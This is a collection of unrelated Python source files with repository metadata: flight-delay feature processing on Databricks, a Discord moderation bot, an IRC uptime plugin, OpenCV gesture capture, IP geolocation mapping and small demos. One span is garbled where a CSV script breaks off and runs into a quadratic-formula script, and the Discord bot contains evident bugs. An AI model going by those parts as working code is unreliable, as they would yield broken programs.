0)] = 0.00000001\n inv_distances = 1 / distances\n inv_distances_sum = numpy.sum(1 / distances, axis=1)\n interpolated_y_vals = numpy.sum(inv_distances * indices_2d[0], axis=1) / inv_distances_sum\n interpolated_x_vals = numpy.sum(inv_distances * indices_2d[1], axis=1) / inv_distances_sum\n return interpolated_x_vals, interpolated_y_vals\n\n","repo_name":"BeamIO-Inc/resippy","sub_path":"resippy/image_objects/earth_overhead/earth_overhead_point_calculators/igm_point_calc.py","file_name":"igm_point_calc.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"32168944737","text":"\n\n# coding: utf-8\n\n\n# Create a image\n\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\nimport random\n\ndef get_rnd_color():\n\treturn (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n\ndef get_rnd_code(n):\n\tcode = ''\n\tfor i in range(n):\n\t\tcode = code + str(chr(random.randint(65, 90)))\n\treturn code\n\nwidth, height = 150, 50\n\nimage = Image.new('RGB', (width, height))\n\ndraw = ImageDraw.Draw(image)\n\nfor i in range(width):\n\tfor j in range(height):\n\t\tdraw.point((i, j), get_rnd_color())\n\nfont = ImageFont.truetype('arial.ttf', 25)\n\ndraw.text((10, 10), get_rnd_code(7), fill=(255, 255, 255, 1), font=font)\n# image = 
image.filter(ImageFilter.BLUR)\n\n\nimage.save('./code.png')\n\n\n","repo_name":"renhongl/python_demo","sub_path":"python_demo_v1/study/study_image_lib.py","file_name":"study_image_lib.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16387521735","text":"# Databricks notebook source\n# import libraries\nimport pyspark.sql.functions as F\nfrom pyspark.sql.types import *\nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfrom pyspark.sql import functions as f\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import monotonically_increasing_id\nfrom pyspark.sql.functions import isnan, when, count, col, isnull, percent_rank, avg, mean\nfrom pyspark.sql.functions import min\nfrom pyspark.sql.functions import col, max\nfrom pyspark.sql.functions import format_string\nfrom pyspark.sql.functions import substring\nfrom pyspark.sql.functions import concat_ws\nfrom pyspark.sql.functions import concat\nfrom pyspark.sql.functions import to_timestamp\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import to_utc_timestamp\nfrom pyspark.sql.functions import expr\nfrom pyspark.sql.functions import regexp_replace\nfrom pyspark.sql.functions import instr\nfrom pyspark.sql.functions import row_number\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import IntegerType\n\nfrom pyspark.ml.linalg import DenseVector, SparseVector, Vectors\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler, StringIndexer,OneHotEncoder\nfrom pyspark.ml.classification import MultilayerPerceptronClassifier\n\n\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.ml.classification import GBTClassifier\n\nfrom pyspark.ml.classification import RandomForestClassifier, DecisionTreeClassifier, LogisticRegression\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator, BinaryClassificationEvaluator\n\n# COMMAND ----------\n\n#Initializes blob storage credentials/location\nblob_container = \"w261-sec4-group2\" # The name of your container created in https://portal.azure.com\nstorage_account = \"kdevery\" # The name of your Storage account created in https://portal.azure.com\nsecret_scope = \"sec4-group2\" # The name of the scope created in your local computer using the Databricks CLI\nsecret_key = \"w261-key\" # The name of the secret key created in your local computer using the Databricks CLI \nblob_url = f\"wasbs://{blob_container}@{storage_account}.blob.core.windows.net\"\nmount_path = \"/mnt/mids-w261\"\n\n#Points to SAS token\nspark.conf.set(\n f\"fs.azure.sas.{blob_container}.{storage_account}.blob.core.windows.net\",\n dbutils.secrets.get(scope = secret_scope, key = secret_key)\n)\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Validation Folds\n\n# COMMAND ----------\n\n#feature processing of dfs\n\ntrain_df=train_df.select(\"*\", f.row_number().over(Window.partitionBy().orderBy(\"Date_Time_sched_dep_utc\")).alias(\"Index\"))\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = test_df.withColumn(\"holiday_period\", 
test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\n#string indexing of carrier\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\ntrain_df = carrier_indexer.fit(train_df).transform(train_df)\n\n\n#one hot encoding\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", outputCol=\"carrier_vec\")\ntrain_df = onehotencoder_carrier_vector.fit(train_df).transform(train_df)\n\n# COMMAND ----------\n\n#splitting training dataframe into five folds contained in dictionary \"d\"\n\nd = {}\nfolds = ['df1','df2','df3','df4','df5']\n\neach_len = train_df.count()/5\nstart = 1\nval_size = each_len/5\nstop = each_len\nprecision_list = []\n\nfor fold in folds:\n d[fold] = train_df.filter(col('Index').between(start,stop))\\\n .withColumn('cv', F.when(col('Index').between(start,(stop-val_size)), 'train')\n .otherwise('val'))\n start += each_len\n stop += each_len\n\n \n\n# COMMAND ----------\n\ntrain_df.createOrReplaceTempView('train_view')\n\n# COMMAND ----------\n\n# MAGIC %sql \n# MAGIC \n# MAGIC SELECT holiday_period,mean_carrier_delay,Pagerank_Score,\n# MAGIC PREV_FLIGHT_DELAYED,origin_percent_delayed,\n# MAGIC dest_percent_delayed,\n# MAGIC ORIGIN_Prophet_trend,\n# MAGIC ORIGIN_Prophet_pred,\n# MAGIC DEST_Prophet_trend,\n# MAGIC DEST_Prophet_pred\n# MAGIC FROM train_view\n# MAGIC LIMIT 10\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT COUNT(*)\n# MAGIC FROM train_view\n# MAGIC WHERE ORIGIN_Prophet_trend IS NULL\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\ntrain_df.columns\n\n# COMMAND ----------\n\ndef process_fold_df(fold_df):\n \n \n #imputation\n fold_df.createOrReplaceTempView(\"fold_view\")\n \n imputation_columns = ['CRS_ELAPSED_TIME','HourlyAltimeterSetting','HourlyDewPointTemperature',\n 'HourlyDryBulbTemperature','HourlyRelativeHumidity','HourlySeaLevelPressure',\n 'HourlyStationPressure','HourlyVisibility','HourlyWetBulbTemperature',\n 'HourlyWindDirection','mean_carrier_delay','ORIGIN_Prophet_trend',\n 'ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred',]\n\n means = {}\n\n for impute_col in imputation_columns:\n mean = spark.sql(f\"SELECT AVG({impute_col}) FROM fold_view\").collect()[0][0]\n means[impute_col] = mean\n \n print(means)\n \n #fill Nones and Nans - Seems to error sometimes?\n fold_df = fold_df.fillna(0,[\"HourlyWindGustSpeed\"]) \\\n .fillna(means[\"CRS_ELAPSED_TIME\"],[\"CRS_ELAPSED_TIME\"]) \\\n .fillna(means[\"HourlyAltimeterSetting\"],[\"HourlyAltimeterSetting\"]) \\\n .fillna(means[\"HourlyDewPointTemperature\"],[\"HourlyDewPointTemperature\"]) \\\n .fillna(means[\"HourlyDryBulbTemperature\"],[\"HourlyDryBulbTemperature\"]) \\\n .fillna(0,[\"HourlyPrecipitation\"]) \\\n .fillna(means[\"HourlyRelativeHumidity\"],[\"HourlyRelativeHumidity\"]) \\\n .fillna(means[\"HourlySeaLevelPressure\"],[\"HourlySeaLevelPressure\"]) \\\n .fillna(means[\"HourlyStationPressure\"],[\"HourlyStationPressure\"]) \\\n .fillna(means[\"HourlyVisibility\"],[\"HourlyVisibility\"]) \\\n .fillna(means[\"HourlyWetBulbTemperature\"],[\"HourlyWetBulbTemperature\"]) \\\n .fillna(means[\"HourlyWindDirection\"],[\"HourlyWindDirection\"]) \\\n .fillna(0,[\"HourlyWindSpeed\"]) \\\n .fillna(\"\",[\"TAIL_NUM\"])\\\n .fillna(0,['holiday_period'])\\\n .fillna(means['mean_carrier_delay'],['mean_carrier_delay'])\\\n .fillna(0,['PREV_FLIGHT_DELAYED'])\\\n .fillna(0,['origin_percent_delayed'])\\\n .fillna(0,['dest_percent_delayed'])\\\n 
.fillna(means['ORIGIN_Prophet_trend'],['ORIGIN_Prophet_trend'])\\\n .fillna(means['ORIGIN_Prophet_pred'],['ORIGIN_Prophet_pred'])\\\n .fillna(means['DEST_Prophet_trend'],['DEST_Prophet_trend'])\\\n .fillna(means['DEST_Prophet_pred'],['DEST_Prophet_pred'])\n \n\n \n #vector assembler\n feature_cols = ['MONTH','DAY_OF_MONTH','DAY_OF_WEEK','DISTANCE','HourlyWindSpeed','Rain','Blowing','Snow','Thunder','CloudySkyCondition','carrier_vec', 'holiday_period','mean_carrier_delay','Pagerank_Score','PREV_FLIGHT_DELAYED','origin_percent_delayed','dest_percent_delayed','ORIGIN_Prophet_trend','ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred']\n #assemble = VectorAssembler(inputCols=feature_cols, outputCol='features')\n #outputCol = \"features\"\n df_va = VectorAssembler(inputCols = feature_cols, outputCol = 'feature_vector')\n model_input = df_va.transform(fold_df)\n \n #rename delay flag to label\n model_input = model_input.withColumnRenamed(\"DEP_DEL15\",\"label\")\n #model_input = assemble.transform(fold_df) \\\n # .withColumnRenamed('DEP_DEL15', 'label')\n \n #scaling\n scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n model_input = scaler.fit(model_input).transform(model_input)\n \n #check if cv exists, should only exist for cross fold validation not on full train, test\n if 'cv' in model_input.columns:\n model_input = model_input.select('label', 'scaled_feature_vector','cv')\n else:\n model_input = model_input.select('label', 'scaled_feature_vector')\n \n return model_input\n\n# COMMAND ----------\n\nd_processed = {}\nfor key in d.keys():\n print(key)\n d_processed[key] = process_fold_df(d[key])\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# d_processed['df1'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_1\")\n# d_processed['df2'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_2\")\n# d_processed['df3'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_3\")\n# d_processed['df4'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_4\")\n# d_processed['df5'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_5\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Full Train and Test Sets\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n#string indexing of carrier for train\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\nindexer_transformer = carrier_indexer.setHandleInvalid(\"keep\").fit(train_df)\ntrain_df = indexer_transformer.transform(train_df)\n\n#one hot encoding for train\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", outputCol=\"carrier_vec\")\nonehotencoder_transformer = onehotencoder_carrier_vector.fit(train_df)\ntrain_df = onehotencoder_transformer.transform(train_df)\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\n#string indexing of carrier for test\n#one hot encoding for test\ntest_df = indexer_transformer.transform(test_df)\ntest_df = onehotencoder_transformer.transform(test_df)\n\n# COMMAND ----------\n\nlen(indexer_transformer.labels)\n\n# COMMAND ----------\n\n#cast holiday to integer\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = 
test_df.withColumn(\"holiday_period\", test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\nprocessed_train_df = process_fold_df(train_df)\n\n#scale to train on train set\n# scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n# scaler_transformer = scaler.fit(processed_train_df)\n# processed_train_df = scaler_transformer.transform(processed_train_df)\n\nprocessed_test_df = process_fold_df(test_df)\n# #scale to train on test set\n# processed_test_df = scaler_transformer.transform(processed_test_df)\n\n\n# COMMAND ----------\n\nprocessed_test_df1 = processed_test_df.withColumn(\"index\", monotonically_increasing_id()) \n\n# COMMAND ----------\n\ndisplay(processed_train_df)\n\n# COMMAND ----------\n\ndisplay(processed_test_df1)\n\n# COMMAND ----------\n\nprocessed_test_df.count()\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# processed_train_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_train\")\n# processed_test_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_test\")\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(f\"{blob_url}\"))\n\n# COMMAND ----------\n\n","repo_name":"cmunugala/flight-delay","sub_path":"Model_building/Process_data.py","file_name":"Process_data.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71774486568","text":"import csv\n\nwith open('stage3_test.csv', newline='') as csv_in, open(\"10000 int:\r\n \"\"\"\r\n Calcula e retorna o valor do delta.\r\n \"\"\"\r\n\r\n return (b**2) - (4*a*c)\r\n\r\n\r\ndef calculate_bhaskara(a: int, b: int, c: int) -> Tuple[float, float]:\r\n \"\"\"\r\n Calcula e retorna o resultado da formula de bhaskara. 
\r\n \"\"\"\r\n\r\n assert isinstance(a, int), \"o valor do coeficiente a nao eh inteiro\"\r\n assert a != 0, \"o valor do coeficiente a nao pode ser igual a 0\"\r\n assert isinstance(b, int), \"o valor do coeficiente b nao eh inteiro\"\r\n assert isinstance(c, int), \"o valor do coeficiente c nao eh inteiro\"\r\n\r\n\r\n delta = calculate_delta(a=a, b=b, c=c)\r\n\r\n if delta < 0:\r\n print(f\"A equacao nao possui raizes pertencentes ao conjunto dos numeros reais, pois delta = {round(delta, 2)} < 0\")\r\n return\r\n \r\n x1 = ((-b) + (sqrt(delta))) / (2*a)\r\n x2 = ((-b) - (sqrt(delta))) / (2*a)\r\n\r\n print(f\"As raizes da equacao {a}(x^2) {'+' if b > 0 else ''}{b}(x) {'+' if c > 0 else ''}{c} sao x1 = {round(x1, 2)} e x2 = {round(x2, 2)}\")\r\n\r\n return x1, x2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n Modifique os valores de a, b e c a sua escolha.\r\n \"\"\"\r\n\r\n a = -1\r\n b = 6\r\n c = -9\r\n\r\n calculate_bhaskara(a=a, b=b, c=c)","repo_name":"eliasciceros/criando_apis_em_python","sub_path":"atividade_1/formula_de_Bhaskara.py","file_name":"formula_de_Bhaskara.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23932554674","text":"#=========================================================\n#\t\t\t\t\tBiblio\n#=========================================================\n\nimport discord # Импортируем библиотеку дискорд\nfrom discord.ext import commands \nfrom discord.utils import get\nfrom config import config # импортируем переменную конфиг\nimport json\nimport random\n\n#=========================================================\n#\t\t\t\t\tEvents\n#=========================================================\n\nclient = commands.Bot(command_prefix = config['prefix'])\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n\tprint('[LOG] Bot a online!') # Пишем в консоль о том что бот работает\n\n\tawait client.change_presence( status = discord.Status.online, activity = discord.Game('Discord')) # статус\n\n\n#=========================================================\n#\t\t\t\t\tCode\n#=========================================================\n#=========================================================\n#\t\t\t\t\tКоманда \"Kick\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def kick(ctx, member: discord.Member = None, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.kick( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Kick\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот кикнул пользователя {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Ban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def ban( ctx, member: discord.Member, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.ban( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Ban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот забанил игрока {member.mention}. 
Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Mute\"\n#p.s. создайте роль \"Mute\" для начала\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def mute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.add_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Mute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот дал мут игроку {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Unmute\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unmute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.remove_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unmute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот убрал мут с игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n#=========================================================\n#\t\t\t\t\tКоманда \"Unban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unban(ctx, *, member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tbanned_users = await ctx.guild.bans()\n\n\tfor banned_entry in banned_users:\n\t\tuser = banned_entry.user\n\n\t\tawait ctx.guild.unban(user)\n\t\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот разбанил игрока {member.mention}. 
Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n\t\treturn\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Clear\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True)\nasync def clear(ctx, amount=5):\n\tawait ctx.channel.purge(limit=amount)\n\n#=========================================================\n#\t\t\t\t\tКоманда \"changestatus\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True )\nasync def changestatus( ctx, statustype:str = None, *, arg:str = None):\n if statustype is None: # Type Check\n await ctx.send( 'Вы не указали тип Статуса' )\n elif arg is None: # Arg Check\n await ctx.send( 'Вы не указали нужный аргумент' )\n else:\n if statustype.lower() == 'game': # Game\n await Bot.change_presence (activity=discord.Game( name = arg) )\n elif statustype.lower() == 'listen': # Listen\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.listening, name = arg) )\n elif statustype.lower() == 'watch': # Watch\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.watching, name = arg) )\n#=========================================================\n#\t\t\t\t\tRun a bot\n#=========================================================\nclient.run(config['token'])\n","repo_name":"JoJoDevelopers/code.py","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73699160167","text":"import time\nimport sys\nimport os\nimport pyircbot\nfrom datetime import timedelta\n\nif len(sys.argv) < 2:\n print(\"Port!\")\n sys.exit(2)\n\nPORT=int(sys.argv[1])\n\ndef load_token(fname):\n path = os.path.expanduser(fname)\n with open(path, 'r') as f:\n token = f.readlines()[0].strip()\n\n return token\n\ndef onMessage(bot, message):\n if message.command != \"PRIVMSG\":\n return\n\n CMD = \"!osuptime\"\n if not message.params[1][:len(CMD)] == CMD:\n return\n\n with open('/proc/uptime', 'r') as f:\n uptime_seconds = float(f.readline().split()[0])\n uptime_string = str(timedelta(seconds = uptime_seconds)) \n\n uptime_msg = \"{color} Host system uptime: {uptime}! 
{reset}\".format(\n color=chr(0x03) + '07,01',\n reset=chr(0x0F),\n uptime=uptime_string \n )\n\n resp = pyircbot.IRCMessage()\n resp.command = \"PRIVMSG\"\n resp.params = [pyircbot.response_destination(message), uptime_msg]\n bot.sendIrcMessage(resp)\n\nplugin = pyircbot.Plugin()\nplugin.name='leettime'\nplugin.token=load_token('~/ircbot_token')\nplugin.onMessage = onMessage\n\nbot = pyircbot.Bot('127.0.0.1', PORT, plugin)\nbot.start()\n\nsent = False\nwhile bot.isRunning():\n time.sleep(0.1)\n\nbot.wait()\n","repo_name":"kolodziej/ircbot","sub_path":"py-plugins/osuptime.py","file_name":"osuptime.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22215503466","text":"# 从摄像头出采集手势照片,用作训练集与测试集\n# 基于opencv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport sys, os, re\nimport cv2\n\n# 清空特定文件夹内的文件\ndef clear_dir(path='.\\dataset\\HAND POSE'):\n print(\"start trying to clean the path\")\n time.sleep(1)\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n if len(files) == 0:\n print(\"dir already cleaned\")\n time.sleep(2)\n else:\n for fi in files:\n os.remove(path + '\\\\' + fi)\n files = os.listdir(path)\n if len(files) == 0:\n print(\"successfully clean the dir\")\n time.sleep(2) \n\n# 控制摄像头捕获视频\n# 图片默认存放路径: .\\dataset\\HAND POSE\ndef control_camera(pic_number=10, path='.\\dataset\\HAND POSE'):\n n = 0 # 记录以拍摄的照片\n n1 = 0\n cap1 = cv2.VideoCapture(0) # 用于监控摄像头\n # 清空目标目录\n clear_dir(path)\n path = '.\\dataset\\HAND POSE' + '\\\\'\n print(\"start record picture\")\n\n while(True):\n # 当储存文件的数量达到所需的数量时,退出循环\n if n >= pic_number:\n print(\"reach the picture number\")\n print(\"ending the process\")\n time.sleep(1.5)\n break\n \n # 判断循环开始\n if n > n1:\n n1 = n\n print(\"Start record new picture\")\n\n # capture frame-by-frame\n ret, frame = cap1.read()\n # 绘制输入框\n cv2.rectangle(frame, (200, 120),(440, 360), (255, 0, 0),3) # 确定左上点, 右下点的宽,高以及线宽\n # Display the resulting frame\n cv2.imshow('capture', frame)\n \n # press q to quit the while loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print(\"exit\")\n time.sleep(1)\n break\n # when the number of photo larger than the setted value\n\n # 键入相应的键盘按键时,从摄像头中保存相应的图片\n if cv2.waitKey(1) & 0xFF == ord('a'):\n n += 1\n cv2.imwrite(path + str(n) + '-a.jpg', frame)\n print('saving image: ' + str(n) + '-a.jpg')\n print(\"n: \", n)\n print()\n continue\n \n if cv2.waitKey(1) & 0xFF == ord('s'):\n n += 1\n cv2.imwrite(path + str(n) + '-s.jpg', frame)\n print('saving image: ' + str(n) + '-s.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('d'):\n n += 1\n cv2.imwrite(path + str(n) + '-d.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('w'):\n n += 1\n cv2.imwrite(path + str(n) + '-w.jpg', frame)\n print('saving image: ' + str(n) + '-d.jpg')\n print(\"n: \", n)\n print()\n continue\n\n if cv2.waitKey(1) & 0xFF == ord('o'):\n n += 1\n cv2.imwrite(path + str(n) + '-o.jpg', frame)\n print('saving image: ' + str(n) + '-o.jpg')\n print(\"n: \", n)\n print()\n continue \n \n cap1.release()\n cv2.destroyAllWindows()\n print(\"The final picture number: \", n)\n print(\" \")\n time.sleep(1)\n \n# 图片前处理, 同时读取出每张图片的标签并储存\n# 获取图像ROI,尺寸初设为240*240,在进行进一步缩小至120*120\n# 对图片重命名,同时将图片编号与label保存并导出到csv文件中\ndef pic_preprocess(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) 
== 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"start the picture preprocessing in \" + path)\n time.sleep(1)\n label = []\n column_name = ['label_id','pic_label']\n\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n print(\"treating \" + fi)\n # 分割文件文件名,并将其储存到label_id和label_set中\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n label.append([int(var.group(1)), var.group(2)])\n\n # 对图片进行尺寸处理\n current_file = path + '\\\\' + fi\n img = cv2.imread(current_file)\n if img.size >= 100000: # 确认图片是否在处理前或处理后\n print(\"Before treatment: \", img.shape, img.size, img.dtype) # 获取图像属性 \n img = img[120:360, 200:440] # 获取图像ROI\n img = cv2.resize(img, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_LINEAR) # 图像缩放,采用设置缩放因子的形式\n print(\"After treatment: \", img.shape, img.size, img.dtype)\n cv2.imwrite(current_file, img)\n\n # 单张照片处理结束\n print(\"finish treating \" + fi)\n print()\n else:\n # 跳过\n print(\"skip \" + fi)\n print()\n\n # break # 用于调试\n\n # 存入到labels中并导出为csv文件\n labels = pd.DataFrame(data=label, columns=column_name)\n labels = labels.sort_values(by = 'label_id', ascending=True)\n # print(labels)\n labels.to_csv(path + '\\\\' + 'labels.csv', encoding='gbk')\n return labels\n\n# 收集得到的图片进行重命名\ndef try_rename(path='.\\dataset\\HAND POSE'):\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n # 若无照片文件存在\n if len(files) == 0:\n print(\"no picture exists\")\n return 0\n else:\n print(\"rename all pic files\")\n time.sleep(0.5)\n for fi in files:\n if (re.match('.*?\\.(\\w+)', fi).group(1)) == 'jpg':\n var = re.match('(\\d+)-(a|s|d|w|o).jpg', fi)\n os.rename(path+ '\\\\' +fi, path+ '\\\\' +var.group(1) + '.jpg')\n\n\n# get_pic主程序\ndef pic_main(number=100):\n control_camera(pic_number=number)\n print(\"picture capture finish.\")\n print()\n time.sleep(0.5)\n pic_preprocess()\n print(\"picture preprocess finish.\")\n print()\n time.sleep(0.5)\n try_rename()\n print(\"picture rename finish.\")\n print()\n time.sleep(0.5)\n\nif __name__ == \"__main__\":\n n = 50\n # control_camera(pic_number=n)\n # pic_preprocess()\n # try_rename()\n pic_main(number=n)\n\n\n'''\n # opencv库基本摄像头操作\n cap = cv2.VideoCapture(0) # 创建摄像头对象\n print(type(cap))\n # 逐帧显示视频播放\n while(True):\n # 利用read()函数读取视频的某帧\n ret, frame = cap.read()\n # 展示\n cv2.imshow('capture', frame)\n # 若检测到键盘键入q,则退出\n if cv2.waitKey(1) & 0xFF == ord('q'):\n # 释放摄像头对象和窗口\n cap.release()\n cv2.destroyAllWindows()\n break\n'''","repo_name":"Alexnll/Hand-Pose-Estimation","sub_path":"get_pic.py","file_name":"get_pic.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12850707045","text":"import geocoder\nimport folium\n\n# معرفة الاشخاص عن طريق الخريطة \n\n\n# هذا الكود عبارة متغير + عنوان الايبي الخاص بي \nour_ip = geocoder.ip(\"me\")\n\n#متغير يسمي الموقع ثم اعطيه الايبي \nlocation = our_ip.latlng\n\n# متغير الخريطة ثم اعطيه الموقع + حجم التكبير \nour_map = folium.Map(location=location, zoom_start=10)\n\n#هذا الكود يضع الموقع علي الخريطة \nfolium.Marker(location).add_to(our_map)\n\n# هذا الكود يضع بيانات الخريطة في صفحة بمتداد اتش تي ام ايل\nour_map.save(\"map.html\")\n\n#هنا نطبع الموقع \nprint(location)","repo_name":"waleed-nemer/python-socket","sub_path":"معرفة مكان اي شخص علي الخريطة/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"ar","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39289985298","text":"from PyQt5 import QtWidgets, 
